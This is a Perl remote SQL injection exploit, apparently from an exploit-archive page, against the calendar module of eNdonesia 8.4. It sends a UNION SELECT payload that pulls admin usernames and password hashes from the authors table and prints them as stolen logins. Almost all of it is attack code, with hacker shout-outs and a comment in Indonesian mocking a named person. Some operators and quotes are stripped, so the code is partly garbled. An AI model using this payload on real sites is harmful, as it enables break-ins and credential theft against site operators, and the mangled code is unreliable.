#!/usr/bin/perl
#/-----------------------------------------------
#| /----------------------------------------- |
#| | Remote SQL Exploit | |
#| | eNdonesia 8.4 Remote SQL Exploit | |
#| | | |
#| | Calendar Module | |
#| -----------------------------------------/ |
#| /----------------------------------------- |
#| | Presented By Jack | |
#| | MainHack Enterprise | |
#| | & | |
#| | #MainHack #nob0dy #BaliemHackerlink | |
#| | Jack[at]MainHack[dot]com | |
#| -----------------------------------------/ |
#| /----------------------------------------- |
#| | Hello To: Indonesian h4x0r | |
#| | yadoy666,n0c0py & okedeh | |
#| | VOP Crew [Vaksin13,OoN_BoY,Paman] | |
#| | NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull | |
#| | all MainHack BrotherHood | |
#| -----------------------------------------/ |
#-----------------------------------------------/
use HTTP::Request;
use LWP::UserAgent;
$sql_vulnerable = "/mod.php?mod=calendar&op=list_events
$sql_injection = "-999/**/union select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where name pwd";
if(!@ARGV) { exit(1);}
sub help(){
print "n [?] eNdonesia 8.4 Remote SQL Exploitn";
print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=n";
print " [?] Use : perl $0 n";
print " [?] Dont use ""n";
print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=n";
print " [?] Baliem Hacker - VOP crew - MainHack BrotherHood nn";
print " [?] nn";
}
while (){
my $target = $ARGV[0];
my $exploit = "".$target.$sql_vulnerable.$sql_injection;
print "n [-] Trying to inject $target ...nn";
my $request = HTTP::Request-new(GET=$exploit);
my $useragent = LWP::UserAgent-
$useragent-timeout(10);
my $response = $useragent-request($request);
if ($response-is_success){
my $res = $response-
if ($res =~ m/([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
my ($username,$passwd) = ($1,$2);
print " [target] $target n";
print " [loginx] $username:$passwd nn";
exit(0);
}
else {
die " [error] Fail to get username and password.nn";
}
}
else {
die " [error] Fail to inject $target nn";
}
}
#/----------------------------------------------------------------
#| NoGay kalo kita artikan sepintas berarti Tidak ada Gay |
#| namun mari kita perhatikan secara seksama ... |
#| NoGay merupakan kependekan dari NoGe is Gay. |
#| Sungguh, penyembunyian sebuah karakter di balik makna kata. |
#----------------------------------------------------------------/
#Vendor Has been contacted and now working for it.
【eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit】相关文章:
★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)
★ DreamNews Manager (id) Remote SQL Injection Vulnerability
★ WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit
★ MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
★ IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
★ IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit